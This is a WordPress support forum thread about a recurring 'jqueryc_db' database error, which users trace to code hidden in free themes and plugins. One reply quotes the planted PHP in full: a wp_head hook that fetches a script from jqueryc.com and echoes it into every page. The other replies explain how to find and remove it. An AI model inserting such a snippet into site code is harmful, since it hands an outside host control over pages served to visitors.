• got this error when i upload to server..
    at localhost everything working fine.. i seriously have no idea.. try to deactivate all plugin but still same.. help me pls

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter falahhaprak

    (@falahhaprak)

    sry if i post in wrong section

    Have you reviewed Moving_WordPress?

    Thread Starter falahhaprak

    (@falahhaprak)

    everyting is working fine except that error.. if i refresh the site, sometime it display the error and sometime its working..

    Thread Starter falahhaprak

    (@falahhaprak)

    I am having the same Problem at http://www.wirelessnewsplus.com

    Have you reviewed Moving_WordPress?

    Download all of your plugins via ftp. Then, get wingrep (wingrep.com), right-click your downloaded plugins folder, select ‘Windows grep and search all for ‘jqueryc’.

    For ‘File Specifications’, select *.* (this will search all files since they all have an extension such as .php). Deselect ‘count files first’, put your search string in (jqueryc) and click ‘OK’.

    That will show you all your plugins using this in the php code. Deactivate each one until the error goes away. If it was like my site, you may have to do this for a couple days as the error was random, until you happen on the right plugin (I had 5 plugins using that and I have over 100 plugins on my site). In the end, it should resolve your issue.

    For me, it was the ‘Pinterest Automatic’ plugin.

    @panafricantimes
    I detected that it was my template (theme). in functions.php in the first lines I found this

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 15;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    and delete it matter resulted
    I hope they help

    @marlonvaldez – Thank you so very much for that information. I found the same at the same location on my Theme – and everything works and looks great after deleting it.
    Thanks again – really appreciate your help.

    Thread Starter falahhaprak

    (@falahhaprak)

    @wolfdogg – tq so much! its work.. i found it at post.php in my theme plugin..

    wow fantastic.. thank you very much. Works!!!

    woooooooooooow great , and reaaly thankful for you ……

    thanks allottttttt

    Hi everybody, this happend to me too in one of the websites I manage, two days ago and two weeks ago four of the websites I manage were infected with malware. I’ve been investigating since then to see how the malware got into my sites and I am pretty sure that this script is the problem.

    Let me explain what happen and forgive my poor english. You may have this php curl code inserted in your website because it might be a template downloaded for free from somewhere and then edited. PHP can be inserted into any template (wp – joomla – drupal – php websites and may be more).

    What does the scrip do? Ok, I took this part from hakipedia – “PHP supports libcurl which currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP’s ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. cURL can be used in conjunction with PHP scripts for bruteforce attacks (including SQL injection table brute forcing), reconnaissance attacks, spoofing, and data theft.”

    As you can see your information might be in bad hands by now… I recommend to seek and delete the script and change all passwords (ftp, data base, wp users, everything.

    I’ve seen this scrip in many themes including broadway – thesis – supportpress – viroshop – argentum – faultpress well many many more. (All free downloaded – don’t know about payed copies).

    I could see where that could be the cause neo, but not likely it’s the cause for most people. It certainly wasn’t for me. Mine was a theme from directly downloaded from the developer about a month ago and I have had no foul play on my server.. checked that out first thing.

    Deactivating the plugin took care of it for me.

    But granted.. one good injection could easily cause it.. or a black hat plugin that was modified.

Viewing 14 replies - 1 through 14 (of 14 total)
  • The topic ‘Couldn't connect to database server.Couldn't find database jqueryc_db.An unexpec’ is closed to new replies.